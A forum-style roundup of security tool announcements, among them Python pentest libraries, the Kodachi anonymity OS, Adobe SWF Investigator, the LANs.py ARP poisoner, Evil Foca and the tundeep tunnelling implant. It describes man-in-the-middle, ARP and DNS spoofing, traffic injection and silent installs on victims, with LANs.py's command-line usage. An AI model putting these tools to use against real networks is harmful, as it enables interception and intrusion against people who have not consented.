general parsing module lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python Pexpect: control and automate other programs, similar to Don Libes `Expect` system Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython PyQt and PySide: Python bindings for the Qt application framework and GUI library The Python Arsenal for Reverse Engineering is a large collection of tools related to reverse engineering. There is a SANS paper about Python libraries helpful for forensic analysis (PDF). For more Python libaries, please have a look at PyPI, the Python Package Index. Sursa: Dirk Loss: Python tools for penetration testers

Linux Kodachi Posted by W. Almaawali on Oct 20, 2013 The purpose of Linux Kodachi is to provide a secure, anti forensic, and anonymous operating system considering all features that a person who is concern about privacy would need to have in order to be secure. Kodachi is very easy to use all you have to do is boot it up on your pc then you should have an operating system with a vpn connection established + Tor Connection established + DNScrypt service running. No setup or linux knowledge is required from your side we do it all for you. The entire OS is functional from your temporary memory RAM so once you shut it down no trace is left behind all your activities are wiped out for quick guide please click here. Kodachi is based on the solid Linux Debian with customized Gnome3 this makes Kodachi stable, secure, and unique. View screenshots: 1 – 2 – 3 – 4 – 5 – 6 – 7 – 8 – 9. How to use it: First option (recommended): Download the ISO file and burn it on a USB flash memory using a free tool like Rufus or Linux Live then boot your PC from it. You will need to boot and press F12 key to get the boot menu and select your USB on old PCS you have to change your BIOS settings to allow the system to boot from USB as the first option. Second option: Download the ISO file and burn it on a DVD using a free tool like DAEMON Tools then boot your PC from it. Third option: Download the ISO file boot it up using Vmware player or Virtualbox. Fourth option: From first or second option you can permanently install it on your PC. Sursa: Linux Kodachi | Eagle Eye Digital Solutions | Muscat Oman

[h=1]Adobe SWF Investigator[/h] [h=2]Perform quick, comprehensive, analysis of SWF applications[/h] Adobe® SWF Investigator is the only comprehensive, cross-platform, GUI-based set of tools, which enables quality engineers, developers and security researchers to quickly analyze SWF files to improve the quality and security of their applications. With SWF Investigator, you can perform both static and dynamic analysis of SWF applications with just one toolset. SWF Investigator lets you quickly inspect every aspect of a SWF file from viewing the individual bits all the way through to dynamically interacting with a running SWF. [h=3]Download and Discuss[/h] Download SWF Investigator Discuss SWF Investigator [h=3]SWF Investigator Features[/h] From a static perspective, you can disassemble ActionScript 2 (AS2) and ActionScript 3 (AS3) SWFs, view SWF tags and make binary changes to SWF files. SWF Investigator also lets you view associated information, including local shared objects (LSOs) and per site settings. From a dynamic perspective, you can call functions within the SWF, load the SWF in various contexts, communicate via local connections and send messages to Action Message Format (AMF) endpoints in order to test more effectively. SWF Investigator contains an extensible fuzzer for SWF applications and AMF services, so you can search for common Web application attacks. This toolset also provides a variety of utilities including encoders and decoders for SWF data, as well as a basic compiler for testing small pieces of ActionScript code. [h=4]Additional Benefits[/h] SWF Investigator is the only application of its kind that's built on Adobe AIR – a versatile runtime that supports ActionScript, the language used to create SWF applications. This allows for native interaction between the SWF Investigator and the SWF application. Using ActionScript also makes the source code of the tool more intuitive for SWF developers. SWF Investigator has the ability to auto-update, so you don't need to worry about whether or not you have the most current version. Since it's an open source AIR application, SWF Investigator can be modified to fit your environment, and it is cross-platform. Download: Download Adobe SWF Investigator - Adobe Labs

[h=1]LANs.py[/h] Multithreaded asynchronous packet parsing/injecting ARP poisoner. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself. Prereqs: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you choose not to use the -ip option Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. All options: python LANs.py [-a] [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-r IPADDRESS] [-set] [-p] [-na] [-n] [-i INTERFACE] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] [h=2]Usage[/h] [h=3]Simplest usage (including active user targeting):[/h] python LANs.py Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing. Sursa: https://github.com/DanMcInerney/LANs.py

[h=3]Evil Foca - IPv4 and IPv6 Penetration testing tool[/h] Evil Focais a tool for Pentesters and Security Auditors to perform security testing in IPv4/ IPv6 data networks. The tool is capable to do different attacks such as: MITM on IPv4 networks using ARP Spoofing and DHCP ACK injection. MITM on IPv6 networks using Neighbor Advertisement Spoofing, SLAAC Attack, fake DHCPv6. DoS (Denial of Service) on IPv4 networks using ARP Spoofing. DoS (Denial of Service) on IPv6 networks using SLAAC Attack. DNS Hijacking. Download: http://www.informatica64.com by d3v1l at 7:45 PM Sursa: Security-Shell: Evil Foca - IPv4 and IPv6 Penetration testing tool

[h=1]tundeep[/h] Tundeep is a layer 2 VPN/injection tool that resides [almost] entirely in user space on the victim aside from the pcap requirement. This can be handled via a silent install however. The tool will build on Linux and Windows victims. Windows compilation is achieved using Cygwin. The attacker must be a Linux machine however as kernel TUN/TAP support is required. It works just fine on Backtrack/Kali. —– DOWNLOAD/CHANGELOG: v0.1a_20130910: [DOWNLOAD tundeep_v0.1a_20130910.tgz] v0.2a_20130916: [DOWNLOAD tundeep_v0.2a_20130916.tgz] tundeep_v0.2a_20130916: - IPv6 support (-6, -T) - Compression support (-C) – must be enabled on both sides - Better error checking and debugging - Misc bug fixes and code improvements - Makefile improvements to detect Cygwin/Linux without manual edits - README updates - Added default checksum feature (-K disables) – added overhead, improved reliability. Must be disabled on both sides Tundeep can also be found on GitHub Sursa + Tutorial: Tundeep | IO Digital Sec